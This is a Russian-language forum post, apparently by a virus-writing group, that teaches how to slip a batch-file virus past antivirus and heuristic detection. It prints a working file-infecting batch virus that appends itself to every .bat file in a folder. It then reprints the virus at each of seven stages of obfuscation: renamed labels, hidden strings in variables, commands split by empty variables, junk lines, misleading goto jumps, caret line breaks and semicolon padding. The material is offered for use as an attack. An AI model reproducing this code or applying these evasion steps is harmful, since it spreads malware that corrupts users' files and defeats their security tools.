Обход Антивирусов. Обфускация.

Обход Антивирусов и эвристического Анализа.
VX BATCH LAB/DR RUSTAM

Спойлер: Развернуть

Код (Text):

1.                
2.  
3. И Так начнём.
4. Имеется вирус и он обнаруживается АВ.
5.  
6. #######################
7.  
8. @echo off
9. echo orgy > infect1.bat
10. echo if [%%1]==[infect1.bat] goto DontBother > infect2.bat
11. echo if [%%1]==[infect2.bat] goto DontBother >> infect2.bat
12. echo copy %%1 + infect1.bat %%1 >> infect2.bat
13. echo attrib +r %%1 >> infect2.bat
14. echo :DontBother >> infect2.bat
15. attrib +r infect1.bat
16. attrib +r infect2.bat
17. for %%f in (*.bat) do call infect2 %%f
18. attrib -r infect1.bat
19. attrib -r infect2.bat
20. del infect1.bat
21. del infect2.bat
22.  
23. ##########################
24.  
25. 1.Меняем метки и имена файлов.
26. Получаем.
27.  
28. ##########################
29.  
30. @echo off
31. echo DGH > RUM1.bat
32. echo if [%%1]==[RUM1.bat] goto CTX > RUM2.bat
33. echo if [%%1]==[RUM2.bat] goto CTX >> RUM2.bat
34. echo copy %%1 + RUM1.bat %%1 >> RUM2.bat
35. echo attrib +r %%1 >> RUM2.bat
36. echo :CTX >> RUM2.bat
37. attrib +r RUM1.bat
38. attrib +r RUM2.bat
39. for %%f in (*.bat) do call RUM2 %%f
40. attrib -r RUM1.bat
41. attrib -r RUM2.bat
42. del RUM.bat
43. del RUM2.bat
44.  
45. ##########################
46.  
47. Уже на этом этапе отвалятся детекты у некоторых АВ.
48. ИЗМЕНЕНИЯ БУДУТ КАПСОМ ДЛЯ ТОГО ЧТОБЫ БЫЛО ВИДНО ЧТО ИЗМЕНИЛОСЬ.
49.  
50. 2.Нужно заменить 'bat' на что нибудь менее приметное.
51. Делаем это через 'Set'.
52.  
53. ############################
54.  
55. @echo off
56. SET #U=BAT
57. echo DGH > RUM1.%#U%
58. echo if [%%1]==[RUM1.%#U%] goto CTX > RUM2.%#U%
59. echo if [%%1]==[RUM2.%#U%] goto CTX >> RUM2.%#U%
60. echo copy %%1 + RUM1.%#U% %%1 >> RUM2.%#U%
61. echo attrib +r %%1 >> RUM2.%#U%
62. echo :CTX >> RUM2.%#U%
63. attrib +r RUM1.%#U%
64. attrib +r RUM2.%#U%
65. for %%f in (*.%#U%) do call RUM2 %%f
66. attrib -r RUM1.%#U%
67. attrib -r RUM2.%#U%
68. del RUM.%#U%
69. del RUM2.%#U%
70.  
71. ############################
72.  
73. 3.Дальше больше.
74. Команды 'del'  'copy' 'attrib' 'for' тоже нужно замаскировать.
75. Но использовать будем не 'Set',
76. A просто пустые переменные(прим. %СлучайныеСимволы%)
77.  
78. ###########################
79.  
80. @echo off
81. SET #U=BAT
82. echo DGH > RUM1.%#U%
83. echo if [%%1]==[RUM1.%#U%] goto CTX > RUM2.%#U%
84. echo if [%%1]==[RUM2.%#U%] goto CTX >> RUM2.%#U%
85. echo c%JY#%o%JY#%py %%1 + RUM1.%#U% %%1 >> RUM2.%#U%
86. echo at%JY#%tr%JY#%ib +r %%1 >> RUM2.%#U%
87. echo :CTX >> RUM2.%#U%
88. %JY#%at%JY#%tri%JY#%b +r RUM1.%#U%
89. a%JY#%t%JY#%tr%JY#%ib +r RUM2.%#U%
90. f%JY#%o%JY#%r %%f in (*.%#U%) do call RUM2 %%f
91. at%JY#%tr%JY#%ib -r RUM1.%#U%
92. a%JY#%ttri%JY#%b -r RUM2.%#U%
93. d%JY#%e%JY#%l RUM.%#U%
94. d%JY#%e%JY#%l RUM2.%#U%
95.  
96. ############################
97. Уже смотрится очень красиво. Дальше больше....
98.  
99. 4.Добавим команды и строки не влияющие на работу.
100. cls rem echo dir title
101. И просто мусора.
102. После команды 'cls fdhfgkghkg'
103. После меток :METKA gkdhgkghkgdkd
104. После >NUL.
105. Mожно писать что угодно. На работу не влияет.
106.  
107. ############################
108.  
109. @echo off
110. TITLE %RANDOM%
111. SET #U=BAT
112. echo DGH > RUM1.%#U%
113. CLS
114. echo if [%%1]==[RUM1.%#U%] goto CTX > RUM2.%#U%
115. REM UDUFUDUFIF
116. CLS REM CLS EXIT
117. echo if [%%1]==[RUM2.%#U%] goto CTX >> RUM2.%#U%
118. @ECHO. %RANDOM%
119. echo c%JY#%o%JY#%py %%1 + RUM1.%#U% %%1 >> RUM2.%#U%
120. echo at%JY#%tr%JY#%ib +r %%1 >> RUM2.%#U%
121. DIR
122. REM LUDODOSODODYO
123. TITLE CVGFFHH%RANDOM%
124. echo :CTX >> RUM2.%#U%
125. CLS REM SLEEP
126. ECHO YFDGJVFDUVFGKFFGHHC
127. %JY#%at%JY#%tri%JY#%b +r RUM1.%#U%
128. REM OYEIYOEOUFVHKKKGYJ
129. a%JY#%t%JY#%tr%JY#%ib +r RUM2.%#U%
130. ECHO DIR TIME CLS RANDOM TITLE
131. f%JY#%o%JY#%r %%f in (*.%#U%) do call RUM2 %%f
132. CLS ECHO NULL EXIT
133. ECHO TITLE>NUL
134. at%JY#%tr%JY#%ib -r RUM1.%#U%
135. a%JY#%ttri%JY#%b -r RUM2.%#U%
136. DIR
137. d%JY#%e%JY#%l RUM.%#U%
138. d%JY#%e%JY#%l RUM2.%#U%
139. CLS CLS ECHO TITLE NUL
140.  
141. ###########################
142.  
143. 5. Продолжаем извращения.
144. Добавим меток и переходов 'goto' 'Запутаем все и вся.
145. Межу  меток можно вставить команды которые не выполнятся никогда.
146. Типо анти эвристика.
147.  
148. ##########################
149.  
150. @echo off
151. GOTO ZZ
152. EXIT /B 000001
153. :FF
154. TITLE %RANDOM%
155. SET #U=BAT
156. GOTO TT
157. ECHO............
158. CLS
159. :TT
160. echo DGH > RUM1.%#U%
161. CLS
162. echo if [%%1]==[RUM1.%#U%] goto CTX > RUM2.%#U%
163. REM UDUFUDUFIF
164. CLS REM CLS EXIT
165. GOTO HH
166. OYSODODODODODODODIYDKYDODO
167. :HH
168. echo if [%%1]==[RUM2.%#U%] goto CTX >> RUM2.%#U%
169. @ECHO. %RANDOM%
170. echo c%JY#%o%JY#%py %%1 + RUM1.%#U% %%1 >> RUM2.%#U%
171. echo at%JY#%tr%JY#%ib +r %%1 >> RUM2.%#U%
172. GOTO RR
173. DIR
174. REM LUDODOSODODYO
175. TITLE CVGFFHH%RANDOM%
176. :RR
177. echo :CTX >> RUM2.%#U%
178. CLS REM SLEEP
179. ECHO YFDGJVFDUVFGKFFGHHC
180. %JY#%at%JY#%tri%JY#%b +r RUM1.%#U%
181. REM OYEIYOEOUFVHKKKGYJ
182. GOTO UU
183. a%JY#%t%JY#%tr%JY#%ib +r RUM2.%#U%
184. ECHO DIR TIME CLS RANDOM TITLE
185. :UU
186. f%JY#%o%JY#%r %%f in (*.%#U%) do call RUM2 %%f
187. CLS ECHO NULL EXIT
188. ECHO TITLE>NUL
189. at%JY#%tr%JY#%ib -r RUM1.%#U%
190. a%JY#%ttri%JY#%b -r RUM2.%#U%
191. DIR
192. d%JY#%e%JY#%l RUM.%#U%
193. d%JY#%e%JY#%l RUM2.%#U%
194. GOTO HH
195. :ZZ
196. CLS CLS ECHO TITLE NUL
197. GOTO FF
198. :HH
199.  
200. ########################
201.  
202. 6. Разиваем строки символ ^
203. После ^ не должо быть пробелов.
204.  
205. ########################
206.  
207. @echo off
208. GOTO ZZ
209. EXIT /B 000001
210. :FF
211. TITLE %RANDOM%
212. SET #U=BAT
213. GOTO TT
214. ECHO............
215. CLS
216. :TT
217. echo DGH > RUM1.%#U%
218. CLS
219. echo if [%%1]==[RUM1.%#U%] goto ^
220. CTX > RUM2.%#U%
221. REM UDUFUDUFIF
222. CLS REM CLS EXIT
223. GOTO HH
224. OYSODODODODODODODIYDKYDODO
225. :HH
226. echo if [%%1]==[RUM2.%#U%] goto ^
227. CTX >> RUM2.%#U%
228. @ECHO. %RANDOM%
229. echo ^
230. c%JY#%o%JY#%py ^
231. %%1 + RUM1.%#U% %%1 >> RUM2.%#U%
232. echo ^
233. at%JY#%tr%JY#%ib +r %%1 >> RUM2.%#U%
234. GOTO RR
235. DIR
236. REM LUDODOSODODYO
237. TITLE CVGFFHH%RANDOM%
238. :RR
239. echo :CTX >> RUM2.%#U%
240. CLS REM SLEEP
241. ECHO YFDGJVFDUVFGKFFGHHC
242. %JY#%at%JY#%tri%JY#%b +r RUM1.%#U%
243. REM OYEIYOEOUFVHKKKGYJ
244. GOTO UU
245. a%JY#%t%JY#%tr%JY#%ib +r RUM2.%#U%
246. ECHO DIR TIME CLS RANDOM TITLE
247. :UU
248. f%JY#%o%JY#%r %%f in (*.%#U%) do call RUM2 %%f
249. CLS ECHO NULL EXIT
250. ECHO TITLE>NUL
251. at%JY#%tr%JY#%ib -r RUM1.%#U%
252. a%JY#%ttri%JY#%b -r RUM2.%#U%
253. DIR
254. d%JY#%e%JY#%l RUM.%#U%
255. d%JY#%e%JY#%l RUM2.%#U%
256. GOTO HH
257. :ZZ
258. CLS CLS ECHO TITLE NUL
259. GOTO FF
260. :HH
261.  
262. ########################
263.  
264. 7. ;-Не влияет на код заминяет пробел.
265. Также используется для рабияения строк.
266.  
267. ########################
268.  
269. @echo off>NUL.CCCCCCCCCCC
270. GOTO ZZ ;;;;;;;;;;;;;;;
271. EXIT /B 000001
272. :FF SSSSSSSSSSSSSSSSSSSS
273. TITLE %RANDOM% ;;;;;;;;;;
274. SET;;;;; #U=BAT
275. ;;;;GOTO TT
276. ECHO............
277. CLS CFNGFSGFJFGJFGJFJFGJ
278. :TT ;;;;;;;;;;;;;;;;;;;;;
279. echo DGH > RUM1.%#U%
280. CLS ;;;;;;;;;;;;;;;;;;;;;;;;
281. echo;;;;; if [%%1]==[RUM1.%#U%] goto ^
282. CTX > RUM2.%#U% >NUL.HHHHHHHHHHH
283. REM UDUFUDUFIF
284. CLS REM CLS EXIT
285. ;;;;GOTO HH ;;;;;;;;;;;;;;;;;;;
286. OYSODODODODODODODIYDKYDODO
287. :HH ;;;;;;;;;;;;;;;;;FFFFFFFFFFF
288. echo if [%%1]==[RUM2.%#U%] goto ^
289. CTX >> RUM2.%#U%
290. @ECHO. %RANDOM%
291. echo ^
292. ;;;;;;;;;;;;;;;;;;;c%JY#%o%JY#%py ^
293. %%1 + RUM1.%#U% %%1 >> RUM2.%#U%
294. echo ^
295. at%JY#%tr%JY#%ib +r %%1 >> RUM2.%#U%
296. GOTO RR ;;;;;;;;;;;;;;;;;;;;;;;;;
297. DIR;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
298. REM LUDODOSODODYO
299. ;;;;;;;;TITLE CVGFFHH%RANDOM%
300. :RR оррарарао;;;;;;;;;;;;;;;;;
301. ;;;;;;;echo :CTX >> RUM2.%#U%
302. CLS REM SLEEP
303. ECHO YFDGJVFDUVFGKFFGHHC
304. %JY#%at%JY#%tri%JY#%b +r RUM1.%#U%
305. REM OYEIYOEOUFVHKKKGYJ
306. GOTO UU ;;;;;;;;;;;;;;;;;;;;;
307. a%JY#%t%JY#%tr%JY#%ib +r;;;;;;; RUM2.%#U%
308. ECHO DIR TIME CLS RANDOM TITLE
309. :UU VVVVVVVVVVVVVVVVVVVVVVVVVV
310. f%JY#%o%JY#%r %%f in (*.%#U%) do call RUM2 %%f
311. CLS ECHO NULL EXIT
312. ECHO TITLE >NUL.DDDDDDDDDDDDDDDDDD
313. ;;;;;at%JY#%tr%JY#%ib -r RUM1.%#U%
314. ;;;;;a%JY#%ttri%JY#%b -r RUM2.%#U%
315. DIR ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
316. ;;;d%JY#%e%JY#%l;;;;;;;;;;; RUM.%#U%
317. ;;;d%JY#%e%JY#%l;;;;;;;;;; RUM2.%#U%
318. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;GOTO HH
319. :ZZ ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
320. CLS;;;;;;;;;;;;;;; CLS ECHO TITLE NUL
321. GOTO FF ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
322. :HH XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
323.  
324. ########################
325.  
326.  
327. :EOF
328.  
329.